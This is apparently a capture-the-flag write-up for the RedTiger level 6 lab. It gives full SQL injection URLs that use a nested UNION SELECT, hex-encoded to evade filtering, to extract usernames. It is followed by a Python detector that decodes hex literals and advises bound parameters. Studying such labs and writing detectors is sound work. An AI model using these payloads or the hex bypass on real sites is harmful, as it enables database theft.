Double query

http://redtiger.labs.overthewire.org/level6.php?user=-1 union select 1,-1' union select 1,2,3,username,5 from level6_users where status=1 #,3,4,5 #

Here, the inner part

-1' union select 1,2,3,username,5 from level6_users where status=1 #

can be converted to hexadecimal to bypass filtering,

that is:

http://redtiger.labs.overthewire.org/level6.php?user=-0 union select 1,0x2d312720756e696f6e2073656c65637420312c322c332c757365726e616d652c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5 #
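
Detection side of the hex form above, as an added example that is not part of the original note: a keyword check over the raw parameter only sees the outer statement, so this sketch also decodes every 0x literal before checking. The function names and the keyword list are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed, minimal keyword list; a real rule set would be broader.
SQL_KEYWORDS = re.compile(r"\b(union|select|from|where)\b", re.I)
# MySQL-style hex literal with an even number of hex digits.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# Request taken from the note above.
PAGE_URL = (
    "http://redtiger.labs.overthewire.org/level6.php?user=-0 union select 1,"
    "0x2d312720756e696f6e2073656c65637420312c322c332c757365726e616d652c3520"
    "66726f6d206c6576656c365f7573657273207768657265207374617475733d3123"
    ",3,4,5 #"
)

def decode_hex_literals(value):
    """Return the text form of every 0x... literal found in value."""
    return [
        bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
        for m in HEX_LITERAL.finditer(value)
    ]

def inspect_param(value):
    """List SQL seen in clear text and SQL hidden inside hex literals."""
    findings = []
    if SQL_KEYWORDS.search(value):
        findings.append(("plain", value))
    for text in decode_hex_literals(value):
        if SQL_KEYWORDS.search(text):
            findings.append(("hex-encoded", text))
    return findings

def inspect_url(url):
    """Map each query parameter of url to its findings."""
    query = urlsplit(url).query
    return {k: inspect_param(v) for k, v in parse_qsl(query, keep_blank_values=True)}

if __name__ == "__main__":
    for name, findings in inspect_url(PAGE_URL).items():
        for kind, text in findings:
            print(f"{name}: [{kind}] {text}")
```

Because the decoded literal is itself a second statement, the durable fix on the application side is to pass the first query's result to the second query as a bound parameter instead of concatenating it.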